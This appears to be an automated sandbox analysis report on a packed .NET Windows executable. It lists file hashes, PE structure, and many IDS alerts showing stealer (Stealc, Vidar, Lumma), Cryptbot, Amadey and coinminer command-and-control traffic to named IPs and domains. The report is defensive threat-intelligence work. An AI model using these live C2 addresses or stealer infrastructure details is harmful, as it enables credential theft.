                                                                                                                                                                                                                                SHA-256:CE44758F9DDE31CFC170316D7B13004AEF485504C0FF6CC455D5BBD2A0822124
                                                                                                                                                                                                                                SHA-512:4AB36AA97CB851DBB69F1585136EABE2E735C54CACF984B99F448718EA6AB94D710A9A145E08DDC296B7A0BD7507D53F99A319528B67626B85B271F0F91487E2
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:regfG...G....\.Z.................... ....p......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...*............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                \Device\ConDrv

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Documents\iofolko5\hd4YBtMwCrxG4M3aLLza89vv.exe
                                                                                                                                                                                                                                File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):3
                                                                                                                                                                                                                                Entropy (8bit):0.9182958340544896
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:0C11BB317BD26E93C30821526C3834BD
                                                                                                                                                                                                                                SHA1:70B99746FBF26B12B541D4C1A8451FD98B249BB2
                                                                                                                                                                                                                                SHA-256:7393BA4F11E19A5F6BEE10ED995B0D959A52C4470855F6D68D4D1E34E26CB70F
                                                                                                                                                                                                                                SHA-512:62AD6D1D2DABFFDBC800B416A01546C0337EC8B350112E6C09101D847D42BFBDE44C2B3949D3397FCC08BBF2800604FB5A700D71750DB24CF7E15D67AB07E726
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:...

                                                                                                                                                                                                                                Static File Info

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                Entropy (8bit):7.941763956114646
                                                                                                                                                                                                                                TrID:
                                                                                                                                                                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                                                                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                                                                                File name:SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe
                                                                                                                                                                                                                                File size:2'457'088 bytes
                                                                                                                                                                                                                                MD5:96cb7df578398d5d46dd4daeffbdc41f
                                                                                                                                                                                                                                SHA1:7b7ecf7d006c2e2cd2b237dde3402f6b78e6c54b
                                                                                                                                                                                                                                SHA256:e301b79d4279d52c49c886fcd0ab8acc3941c5cf28c7dd0eb57e8af81fe476fb
                                                                                                                                                                                                                                SHA512:84e915d323b1595c387123f7f5d8b5d291e2c2c9a8df9e4eba69deff9cc0ba195872065daa6f1c808a848eb8fd259cfd5f5ea164b8a3c9407bd6ca25fffc8479
                                                                                                                                                                                                                                SSDEEP:49152:Al0Ivwg2krKlsBijSIpWALFfi1zfPmX9YSVY8ZAAiJte:tIvliWVA9i1Te2SVYYAD
                                                                                                                                                                                                                                TLSH:E2B501A88275896CE4D9C5F4F1A6CE1F2E774B2138CDC389F6696EB8D93312ED114423
                                                                                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.... V...............P..l#...........#.. ....#...@.. ........................%...........@................................

                                                                                                                                                                                                                                File Icon

                                                                                                                                                                                                                                Icon Hash:073b7343ccf25803

                                                                                                                                                                                                                                Static PE Info

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Entrypoint:0x6389fe
                                                                                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                                                                                Digitally signed:false
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                Time Stamp:0x9C5620ED [Tue Feb 11 12:37:01 2053 UTC]
                                                                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                                                                OS Version Major:4
                                                                                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                                                                                File Version Major:4
                                                                                                                                                                                                                                File Version Minor:0
                                                                                                                                                                                                                                Subsystem Version Major:4
                                                                                                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                                                                                                Entrypoint Preview

                                                                                                                                                                                                                                Instruction
                                                                                                                                                                                                                                jmp dword ptr [00402000h]
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al

                                                                                                                                                                                                                                Data Directories

                                                                                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x2389a90x4f.text
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x23a0000x20d4c.rsrc
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x25c0000xc.reloc
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x2388f80x38.text
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                Sections

                                                                                                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                .text0x20000x236a040x236c00ad17acdcf138eb7f4a5c04f7df2e147funknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                .rsrc0x23a0000x20d4c0x20e00230606391ada7a5f112675214d6f4876False0.4044156962927757data5.1906625929543475IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                .reloc0x25c0000xc0x20068da1c7ffb326306242633f0d1b25badFalse0.041015625data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                Resources

                                                                                                                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                RT_ICON0x23a1a00x80a9PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9884931839572517
                                                                                                                                                                                                                                RT_ICON0x24225c0x10828Device independent bitmap graphic, 128 x 256 x 32, image size 655360.1811043416538507
                                                                                                                                                                                                                                RT_ICON0x252a940x4228Device independent bitmap graphic, 64 x 128 x 32, image size 163840.2531294284364667
                                                                                                                                                                                                                                RT_ICON0x256ccc0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 92160.29512448132780084
                                                                                                                                                                                                                                RT_ICON0x2592840x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 40960.3625703564727955
                                                                                                                                                                                                                                RT_ICON0x25a33c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 10240.526595744680851
                                                                                                                                                                                                                                RT_GROUP_ICON0x25a7b40x5adata0.7666666666666667
                                                                                                                                                                                                                                RT_VERSION0x25a8200x32cdata0.46921182266009853
                                                                                                                                                                                                                                RT_MANIFEST0x25ab5c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                                                                                                                                                                Imports

                                                                                                                                                                                                                                DLLImport
                                                                                                                                                                                                                                mscoree.dll_CorExeMain

                                                                                                                                                                                                                                Network Behavior

                                                                                                                                                                                                                                Suricata IDS Alerts

                                                                                                                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                2024-09-21T13:33:40.760164+02002018581ET MALWARE Single char EXE direct download likely trojan (multiple families)1192.168.2.949710103.130.147.21180TCP
                                                                                                                                                                                                                                2024-09-21T13:33:41.108483+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949710103.130.147.21180TCP
                                                                                                                                                                                                                                2024-09-21T13:33:41.108483+02002018581ET MALWARE Single char EXE direct download likely trojan (multiple families)1192.168.2.949710103.130.147.21180TCP
                                                                                                                                                                                                                                2024-09-21T13:33:41.479262+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949712176.113.115.3380TCP
                                                                                                                                                                                                                                2024-09-21T13:33:41.490300+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949709147.45.44.10480TCP
                                                                                                                                                                                                                                2024-09-21T13:33:41.675629+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949708147.45.44.10480TCP
                                                                                                                                                                                                                                2024-09-21T13:33:41.819445+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949719176.111.174.10980TCP
                                                                                                                                                                                                                                2024-09-21T13:33:42.362870+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949708147.45.44.10480TCP
                                                                                                                                                                                                                                2024-09-21T13:33:42.377935+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949727162.241.61.218443TCP
                                                                                                                                                                                                                                2024-09-21T13:33:42.379864+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949726162.241.61.218443TCP
                                                                                                                                                                                                                                2024-09-21T13:33:42.662417+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949723185.166.143.50443TCP
                                                                                                                                                                                                                                2024-09-21T13:33:43.497247+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949730162.241.61.218443TCP
                                                                                                                                                                                                                                2024-09-21T13:33:44.675675+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949708147.45.44.10480TCP
                                                                                                                                                                                                                                2024-09-21T13:33:45.044797+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949709147.45.44.10480TCP
                                                                                                                                                                                                                                2024-09-21T13:33:45.120822+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949708147.45.44.10480TCP
                                                                                                                                                                                                                                2024-09-21T13:33:47.467722+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949708147.45.44.10480TCP
                                                                                                                                                                                                                                2024-09-21T13:34:13.833469+02002054350ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M41192.168.2.9497425.53.124.19580TCP
                                                                                                                                                                                                                                2024-09-21T13:34:14.150268+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.94974146.8.231.10980TCP
                                                                                                                                                                                                                                2024-09-21T13:34:14.554960+02002044244ET MALWARE Win32/Stealc Requesting browsers Config from C21192.168.2.94974146.8.231.10980TCP
                                                                                                                                                                                                                                2024-09-21T13:34:14.798575+02002044245ET MALWARE Win32/Stealc Active C2 Responding with browsers Config146.8.231.10980192.168.2.949741TCP
                                                                                                                                                                                                                                2024-09-21T13:34:14.978359+02002044246ET MALWARE Win32/Stealc Requesting plugins Config from C21192.168.2.94974146.8.231.10980TCP
                                                                                                                                                                                                                                2024-09-21T13:34:15.167363+02002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config146.8.231.10980192.168.2.949741TCP
                                                                                                                                                                                                                                2024-09-21T13:34:15.867896+02002044248ET MALWARE Win32/Stealc Submitting System Information to C21192.168.2.94974146.8.231.10980TCP
                                                                                                                                                                                                                                2024-09-21T13:34:16.871917+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.94974146.8.231.10980TCP
                                                                                                                                                                                                                                2024-09-21T13:34:22.869115+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.94974146.8.231.10980TCP
                                                                                                                                                                                                                                2024-09-21T13:34:23.939753+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.94974146.8.231.10980TCP
                                                                                                                                                                                                                                2024-09-21T13:34:25.046045+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.94974146.8.231.10980TCP
                                                                                                                                                                                                                                2024-09-21T13:34:25.768287+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.94974146.8.231.10980TCP
                                                                                                                                                                                                                                2024-09-21T13:34:27.746321+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.94974146.8.231.10980TCP
                                                                                                                                                                                                                                2024-09-21T13:34:28.167720+02002054350ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M41192.168.2.9497495.53.124.19580TCP
                                                                                                                                                                                                                                2024-09-21T13:34:28.472441+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.94974146.8.231.10980TCP
                                                                                                                                                                                                                                2024-09-21T13:34:33.715457+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.949754162.241.61.218443TCP
                                                                                                                                                                                                                                2024-09-21T13:34:37.403302+02002054350ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M41192.168.2.9497565.53.124.19580TCP
                                                                                                                                                                                                                                2024-09-21T13:34:40.989196+02002036289ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)2192.168.2.9542351.1.1.153UDP
                                                                                                                                                                                                                                2024-09-21T13:34:41.171990+02002056004ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (achievenmtynwjq .shop)1192.168.2.9555831.1.1.153UDP
                                                                                                                                                                                                                                2024-09-21T13:34:41.658171+02002056005ET MALWARE Observed Win32/Lumma Stealer Related Domain (achievenmtynwjq .shop in TLS SNI)1192.168.2.949760188.114.97.3443TCP
                                                                                                                                                                                                                                2024-09-21T13:34:43.702789+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949761116.203.165.127443TCP
                                                                                                                                                                                                                                2024-09-21T13:34:45.330220+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949762116.203.165.127443TCP
                                                                                                                                                                                                                                2024-09-21T13:34:46.946829+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949763116.203.165.127443TCP
                                                                                                                                                                                                                                2024-09-21T13:34:47.643249+02002049087ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST1192.168.2.949763116.203.165.127443TCP
                                                                                                                                                                                                                                2024-09-21T13:34:47.802912+02002056005ET MALWARE Observed Win32/Lumma Stealer Related Domain (achievenmtynwjq .shop in TLS SNI)1192.168.2.949764188.114.97.3443TCP
                                                                                                                                                                                                                                2024-09-21T13:34:48.299832+02002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.949764188.114.97.3443TCP
                                                                                                                                                                                                                                2024-09-21T13:34:48.299832+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.949764188.114.97.3443TCP
                                                                                                                                                                                                                                2024-09-21T13:34:48.897654+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949765116.203.165.127443TCP
                                                                                                                                                                                                                                2024-09-21T13:34:50.072379+02002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config1116.203.165.127443192.168.2.949765TCP
                                                                                                                                                                                                                                2024-09-21T13:34:51.164557+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949766116.203.165.127443TCP
                                                                                                                                                                                                                                2024-09-21T13:34:51.859301+02002051831ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M11116.203.165.127443192.168.2.949766TCP
                                                                                                                                                                                                                                2024-09-21T13:34:55.720448+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949768116.203.165.127443TCP
                                                                                                                                                                                                                                2024-09-21T13:34:56.709803+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949769116.203.165.127443TCP
                                                                                                                                                                                                                                2024-09-21T13:34:58.382517+02002856147ETPRO MALWARE Amadey CnC Activity M31192.168.2.94977045.202.35.10180TCP
                                                                                                                                                                                                                                2024-09-21T13:35:00.859949+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949772116.203.165.127443TCP
                                                                                                                                                                                                                                2024-09-21T13:35:01.796654+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949773116.203.165.127443TCP
                                                                                                                                                                                                                                2024-09-21T13:35:04.581380+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949774116.203.165.127443TCP
                                                                                                                                                                                                                                2024-09-21T13:35:06.049583+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949775116.203.165.127443TCP
                                                                                                                                                                                                                                2024-09-21T13:35:08.195936+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949777116.203.165.127443TCP
                                                                                                                                                                                                                                2024-09-21T13:35:10.597024+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949778116.203.165.127443TCP
                                                                                                                                                                                                                                2024-09-21T13:35:12.256533+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949779116.203.165.127443TCP
                                                                                                                                                                                                                                2024-09-21T13:35:13.919022+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949780116.203.165.127443TCP
                                                                                                                                                                                                                                2024-09-21T13:35:16.606956+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949781116.203.165.127443TCP
                                                                                                                                                                                                                                2024-09-21T13:35:20.236859+02002055834ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sentistivowmi .shop)1192.168.2.9582901.1.1.153UDP
                                                                                                                                                                                                                                2024-09-21T13:35:20.281769+02002056008ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (chickerkuso .shop)1192.168.2.9642681.1.1.153UDP
                                                                                                                                                                                                                                2024-09-21T13:35:20.642900+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949782116.203.165.127443TCP
                                                                                                                                                                                                                                2024-09-21T13:35:20.931758+02002056009ET MALWARE Observed Win32/Lumma Stealer Related Domain (chickerkuso .shop in TLS SNI)1192.168.2.949783104.21.88.61443TCP
                                                                                                                                                                                                                                2024-09-21T13:35:23.079490+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.949783104.21.88.61443TCP
                                                                                                                                                                                                                                2024-09-21T13:35:23.079490+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.949783104.21.88.61443TCP
                                                                                                                                                                                                                                2024-09-21T13:35:23.749169+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949784116.203.165.127443TCP
                                                                                                                                                                                                                                2024-09-21T13:35:25.594749+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949785116.203.165.127443TCP
                                                                                                                                                                                                                                2024-09-21T13:35:27.691624+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949786116.203.165.127443TCP
                                                                                                                                                                                                                                2024-09-21T13:35:28.785398+02002056009ET MALWARE Observed Win32/Lumma Stealer Related Domain (chickerkuso .shop in TLS SNI)1192.168.2.949787104.21.88.61443TCP
                                                                                                                                                                                                                                2024-09-21T13:35:29.357540+02002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.949787104.21.88.61443TCP
                                                                                                                                                                                                                                2024-09-21T13:35:29.357540+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.949787104.21.88.61443TCP
                                                                                                                                                                                                                                2024-09-21T13:35:30.369431+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949788116.203.165.127443TCP
                                                                                                                                                                                                                                2024-09-21T13:35:33.001805+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949789116.203.165.127443TCP
                                                                                                                                                                                                                                2024-09-21T13:35:34.885622+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949790147.45.44.10480TCP
                                                                                                                                                                                                                                2024-09-21T13:35:37.141546+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949791116.203.165.127443TCP
                                                                                                                                                                                                                                2024-09-21T13:35:38.964489+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949792116.203.165.127443TCP
                                                                                                                                                                                                                                2024-09-21T13:35:39.856358+02002056022ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (questionmwq .shop)1192.168.2.9648731.1.1.153UDP
                                                                                                                                                                                                                                2024-09-21T13:35:40.351202+02002056023ET MALWARE Observed Win32/Lumma Stealer Related Domain (questionmwq .shop in TLS SNI)1192.168.2.949793172.67.204.62443TCP
                                                                                                                                                                                                                                2024-09-21T13:35:40.519909+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.949793172.67.204.62443TCP
                                                                                                                                                                                                                                2024-09-21T13:35:40.519909+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.949793172.67.204.62443TCP
                                                                                                                                                                                                                                2024-09-21T13:35:40.759550+02002054495ET MALWARE Vidar Stealer Form Exfil1192.168.2.94979445.132.206.25180TCP
                                                                                                                                                                                                                                2024-09-21T13:35:44.757366+02002056023ET MALWARE Observed Win32/Lumma Stealer Related Domain (questionmwq .shop in TLS SNI)1192.168.2.949797172.67.204.62443TCP
                                                                                                                                                                                                                                2024-09-21T13:35:45.228535+02002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.949797172.67.204.62443TCP
                                                                                                                                                                                                                                2024-09-21T13:35:45.228535+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.949797172.67.204.62443TCP
                                                                                                                                                                                                                                2024-09-21T13:35:46.021038+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949798116.203.165.127443TCP
                                                                                                                                                                                                                                2024-09-21T13:35:47.527790+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949799116.203.165.127443TCP
                                                                                                                                                                                                                                2024-09-21T13:35:48.974888+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949800116.203.165.127443TCP
                                                                                                                                                                                                                                2024-09-21T13:35:50.489687+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949802116.203.165.127443TCP
                                                                                                                                                                                                                                2024-09-21T13:35:51.405870+02002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config1116.203.165.127443192.168.2.949802TCP
                                                                                                                                                                                                                                2024-09-21T13:35:52.154914+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949804116.203.165.127443TCP
                                                                                                                                                                                                                                2024-09-21T13:35:52.869312+02002051831ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M11116.203.165.127443192.168.2.949804TCP
                                                                                                                                                                                                                                2024-09-21T13:35:54.301685+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949805116.203.165.127443TCP
                                                                                                                                                                                                                                2024-09-21T13:35:55.279534+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949806116.203.165.127443TCP
